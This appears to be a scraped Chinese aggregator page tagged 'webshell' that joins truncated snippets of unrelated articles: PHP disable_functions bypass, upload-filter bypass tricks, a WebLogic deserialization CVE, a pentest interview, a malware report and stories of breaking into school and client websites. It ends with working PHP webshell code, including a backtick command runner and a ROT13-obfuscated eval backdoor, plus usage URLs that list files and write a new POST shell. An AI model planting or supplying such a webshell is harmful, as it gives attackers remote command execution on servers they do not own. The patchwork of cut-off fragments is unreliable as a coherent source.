webshell

php中函数禁用绕过的原理与利用

早过忘川 提交于 2020-12-24 18:38:19
bypass disable function 是否遇到过费劲九牛二虎之力拿了webshell却发现连个scandir都执行不了?拿了webshell确实是一件很欢乐的事情,但有时候却仅仅只是一个小阶段的结束;本文将会以webshell作为起点从头到尾来归纳bypass disable function的各种姿势。 本文涉及相关实验: 绕过函数过滤 (通过本实验学会通过宽字节方式绕过mysql_real_escape_string()、addslashes()这两个函数。) 从phpinfo中获取可用信息 信息收集是不可缺少的一环;通常的,我们在通过前期各种工作成功执行代码 or 发现了一个phpinfo页面之后,会从该页面中搜集一些可用信息以便后续漏洞的寻找。 我谈谈我个人的几个偏向点: 版本号 最直观的就是php版本号(虽然版本号有时候会在响应头中出现),如我的机器上版本号为: PHP Version 7.2.9-1 那么找到版本号后就会综合看看是否有什么"版本专享"漏洞可以利用。 DOCUMENT_ROOT 接下来就是搜索一下 DOCUMENT_ROOT 取得网站当前路径,虽然常见的都是在/var/www/html,但难免有例外。 disable_functions 这是本文的重点,disable_functions顾名思义函数禁用,以笔者的kali环境为例

HW防守第一天

微笑、不失礼 提交于 2020-12-17 07:59:21
用一个字总结是“ 累 ” 用两个字来总结就是“ 纳尼 ” 懂的都懂 三个字总结“ 太浪费 ” 十几箱红牛、方便面、零食。。。。。0day!!! 还有我速效救心丸(希望就浪费了吧) 四天的马路牙子,我很困!!! 下期预告!!! 近年来云上的数据泄漏经常发生,hackerone aws s3 数据泄漏的漏洞太火了,挖到就是几百刀,而国内对于S3 存储的安全问题挖掘的较少,此篇文章简单介绍一下s3 存储桶的漏洞收割 下下期预告!! CTF上传绕过!!! bypass姿势 禁用js Content-Type绕过 修改文件头 .htaccess解析 .user.ini 后缀名 二次渲染 文件包含 利用windows特性绕过 文件名后小数点 ::$DATA 内容方面的绕过 短标签 javascript(php7后失效) 无字母webshell 什么是Amazon S3? Amazon S3代表Amazon Simple Storage Service,它是一种对象存储服务,可提供行业领先的可扩展性,数据可用性,安全性和性能 存储容器称为“存储桶”,存储桶中的文件称为“对象”。S3为每个存储桶提供了无限的存储空间,所有者可以使用它们来提供文件。可以通过适当配置的ACL(访问控制列表)或ACP(访问控制策略)私有地(通过签名的URL)或公开地提供文件。 本文分享自微信公众号 - 黑伞攻防实验室

Weblogic wls9_async_response 反序列化远程命令执行漏洞(CVE-2019-2725)复现

天大地大妈咪最大 提交于 2020-12-17 00:46:22
一、 漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8。 CNVD 编号:CNVD-C-2019-48814,CNVD对该漏洞的综合评级为“高危”。 漏洞概述 2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814)。WebLogic是美国Oracle公司出品的Java应用服务器,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用。攻击者可利用该漏洞在未授权的情况下远程执行命令。 WebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 wls9-async组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。 影响范围 WebLogic 10.X WebLogic 12.1.3 二、 漏洞复现 环境介绍

渗透测试工程师面试分享

你说的曾经没有我的故事 提交于 2020-12-14 23:11:46
黑客资料文末扫码领取 所面试公司: 安洵信息科技有限公司 薪资待遇: 双休 所在城市: 南京 面试职位: 渗透测试工程师 面试过程 :第一天上午投的简历,下午收到面试邀请,第二天进行的面试,中间也就一次面试,只是等的时间比较长,最后收到录用通知,大概用了两周的时间 面试官的问题: 1、先做一下自我介绍 这个应该是每个面试官都会问的第一个问题吧 2、讲一下你所了解的web漏洞 我就把top10,讲了一下,还把在学院学到的都说了一下 3、你在SRC挖掘中遇到最多的漏洞是什么 SQL注入,xss,越权还有一些弱口令 4、SQL注入分为几种 显错、盲注,这些学院都有教,全部说出去就行 5、详细讲一下SQL注入 讲一下原理,然后把从开始判断注入点到最后获取到库名的过程,用了哪些方法,说一下就行了 6、XSS有几种,详细讲一下 反射型、存储型、DOM型 在把这几种的特性说一下就好了 7、XSS除了获取cookie,还有别的用处吗 这个当时没有回答上来,后来去网上搜索了一下发现也有不少用途 8、讲一下渗透测试的流程 信息收集、寻找功能点、测试漏洞、漏洞分析、漏洞利用 9、讲一下信息收集都收集那些信息 Whois、指纹识别、敏感目录、子域名、端口、还有一些旁站 (当时有点懵,回答的并不是很好) 10、看你简历有写内网渗透,简单讲一下 我当时就把老师教的那些都说给他了,从获取webshell,提权

“看门狗”团伙远控木马投毒计,360安全大脑极速斩杀输出体系防御力

跟風遠走 提交于 2020-12-14 21:21:16
近日,360安全大脑独家捕获“看门狗”团伙最新动向,其正通过伪造某聊天软件官网以及钓鱼邮件等方式,对特定目标人群精准投毒祸乱网络。该组织命名来源于攻击样本包含的中文PDB路径,也有安全厂商称其为“金眼狗”组织。 360 安全大脑基于持续跟踪数据,并对攻击样本进行梳理分析后发现,“看门狗”团伙长期通过申请正规软件开发商签名,进而利用白加黑方式执行远控木马;钓鱼邮件定向投毒,并通过漏洞利用启动远控木马;伪装正规聊天工具捆绑远控模块等三大手段横行网络。 手段1:以假乱真,冒用签名投放远控木马 一直以来,冒用软件开发厂商签名都是“看门狗”团伙的惯用伎俩。从360安全大脑长期监测数据来看,9月下旬至今已追踪到该团伙冒用的十余个数字证书,具体如下: 与此同时,360安全大脑最新数据显示,“看门狗”团伙除申请了与原厂商相同的签名外,还申请了部分同名但大小写不同的高迷惑性签名,以便于测试安全软件反应,为冒用签名投放远控木马试水。 手段2:迷惑性诱饵,钓鱼邮件扩散远控木马 冒用签名之外,360安全大脑数据显示,钓鱼邮件是“看门狗”团伙的第二大惯用伎俩。从360安全大脑捕获的钓鱼邮件攻击样本来看,该团伙通过钓鱼邮件,将伪装成技术资料等文档的恶意程序,投递至目标用户邮箱,以诱骗点击下载。 一旦触发,恶意程序会利用muse音乐播放器栈溢出漏洞执行后续shellcode,并经过几轮内存加载后

如何快速批量刷站,我黑进自己学校的官网拿下大屏幕来告诉你!

╄→尐↘猪︶ㄣ 提交于 2020-12-12 04:27:51
零基础黑客教程,黑客圈新闻,安全面试经验 尽在 # 暗网黑客 # 转载自:https://xz.aliyun.com/t/7786 午安~更新这么久 想了想还是来个介绍吧! 我呢~只是个柠檬精,一枚小小的幕后文章搬运工~ 希望将更多文章呈现出来! 在你的学习生活的道路上留下一点足迹~ 不求关注!只望勿喷# 因为后台留言功能暂无法开启! 有什么疑问或者建议可以在后台留言~ 也可以加小师妹的微信,尽情的“突诉吧” 从1月份入坑到现在,已经5个月了。 这 五个月来一直在刷edusrc,并且在本月初成功达到了总榜第五名。 很多人问我如何快速批量刷站? 那么,他来了。 本次分享一次对自己学校的一次安全检测实战文章。 帮助萌新理清思路,同时,欢迎各位大佬指点不足。 1. 0x01 先看学校的域名ip地址,注意,这里我建议不要看主域名的,看二级域名的ip地址。 因为一些地区的职业院校都是集中统一在一台服务器上的,只有一些二级域名才会搭建 在学校的机房里面如我们学校的二级域名:creat. ** .com 上面搭建的系统是智慧校园系统。 IP归属地与学校地理位置符合 那么开始找C段 fofa关键词: 12.230..1/24在12.230..194:8000下面找到一个系统 功能不详 因为只有一个登录 类似系统有很多,比如OA等 这些系统开始都是一些登录,且是一个闭源程序,一没办法本地测试

实战渗透-看我如何拿下学校的大屏幕

回眸只為那壹抹淺笑 提交于 2020-12-09 01:39:29
从1月份入坑到现在,已经5个月了。这五个月来一直在刷EDUSRC,并且在本月初成功达到了总榜第五名。很多人问我如何快速批量刷站?那么,丹丹妹请他来了。本次分享一次对某某学校的一次安全检测实战文章。帮助萌新理清思路,同时,欢迎各位大佬指点不足。 0x01 先看学校的域名ip地址,注意:这里我建议不要看主域名的,看二级域名的ip地址。因为一些地区的职业院校都是集中统一在一台服务器上的,只有一些二级域名才会搭建在学校的机房里面如某某学校的二级域名: creat. ** .com上面搭建的系统是智慧校园系统。IP归属地与学校地理位置符合。那么开始找C段: fofa关键词: 1 2.230. .1/24 在1 2.230. .194:8000下面找到一个系统。功能不详因为只有一个登录,如图: 类似系统有很多,比如OA等。这些系统开始都是一些登录,且是一个闭源程序,一没办法本地测试,二是不能代码审计。 我个人比较常用的方法: 查看HTML源代码->提取特有文件名/路径等->FOFA寻找相同网站->猜测弱口令->挖掘0day->Getshell 因为程序本身就是闭源,开始的一个登录就让大部分人束手无策。无法探测到里面的内容。所以,遇到此类程序的第一种快捷方法:找相同程序的弱口令, 在首页HTML源代码中,发现一处AJAX请求地址, /Service/C *** .asmx/Get *

渗透测试公司之实战SQL注入拿下网站权限

删除回忆录丶 提交于 2020-12-08 16:55:33
近来,利用sql注入、xss和文件上传漏洞,成功getshell的一个客户网站(必须要拿到客户授权渗透测试许可证明才可以,不得违法入侵),这里简单记录一下整个过程,与大家分享。收集信息,查找漏洞。第一步就是进行信息收集,经过一轮的收集,发现这个网站租的是香港的服务器,没有waf文件;从网站的界面看,这个网站是用cms搭建的,搭建的环境是Iis10.0+php,同时通过目录扫描工具发现了一些网站的目录,但没有找到后台登录地址(这肯定是网站管理员隐藏了后台的地址)。 然后,寻找漏洞,个人一般都是从寻找带有XSS漏洞的sql注入开始,打开网站,burp打开,进入XSS漏洞平台,打开寻找漏洞的途径。第一步是将XSS平台生成的XSS代码,在有输入的地方粘贴,然后集中精力寻找sql注入漏洞(对于不带waf的站点,存在SQL注入)在通过burp之后,就可以开始浏览网页,找出可能存在sql注入的任何地方,只要有project,就可以尝试一下。再经过一测试,发现经常出现sql注入漏洞的登录界面,登录界面都没有sql注入过。太难!!然后继续查找,最后发现存在sql注入的地方。 然后使用burp抓包,把包放进sqlmap中运行,确实存在SQL注入。借助漏洞,顺利拿到了网站所有的表名,也拿到了管理员的账号密码,运气也不错,居然把管理密码给解了(估计这个网站用的是某个老CMS)。下一步需要找到后台地址

三十六、VulnHub渗透测试实战靶场XXE Lab

落花浮王杯 提交于 2020-12-06 04:56:19
XXE Lab是一个难度为中级的XXE漏洞CTF挑战,通过实验学习XXE漏洞的利用方式,获取靶机flag。 预备知识 1. Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用。其大部分环境是做好的虚拟机镜像文件,需要使用VMware或VirtualBox运行。网址: https://www.vulnhub.com 。 2. 靶场说明 XXE Lab是一个难度为初级的XXE漏洞CTF挑战。 3. 建议先学习XXE漏洞基础实验: XML外部实体注入漏洞 实验目的 通过信息收集获取靶机XXE网站地址,利用协议进行XXE漏洞利用,获取靶机flag。 实验环境 靶机:XXELab、ip随机 攻击机:kaliLinux + Windows 10、ip随机 实验步骤一 任务描述:信息收集。 1. 首先查看kali机器IP地址: # ifconfig 2. 使用netdiscover扫描本地网络主机: # netdiscover -r 10.1.1.0/24 -r range:扫描给定范围而不是自动扫描。 扫出两个可疑ip,暂时无法确定哪个才是XXE靶机的IP地址。 3. 使用nmap扫描上述ip: # nmap -sV -p 1-65535 10.1.1.91-v -sV:探测端口服务版本; -p:指定端口; -v:显示扫描过程。 # nmap -sV

php最短一句话后门webshell

a 夏天 提交于 2020-12-03 06:29:51
<?php @`$_GET[c]`; //反引号执行 ?> preg_replace("//e",@str_rot13('@riny($_CBFG[p])'),""); //str_rot13('@riny($_CBFG[p])') == eval($_POST[c]) //字符串执行 ROT13 转换特征码,php version < 5.5.0 /e修饰符才可执行 调用示例: #生成当前目录列表dir.txt http://target_host/webshell.php?c=dir%20>dir.txt #生成菜刀可调用的POST Shell http://target_host/webshell.php?c=echo%20"<?php @eval($_POST[c]);>" > newshell.php 来源: oschina 链接: https://my.oschina.net/u/1389147/blog/505171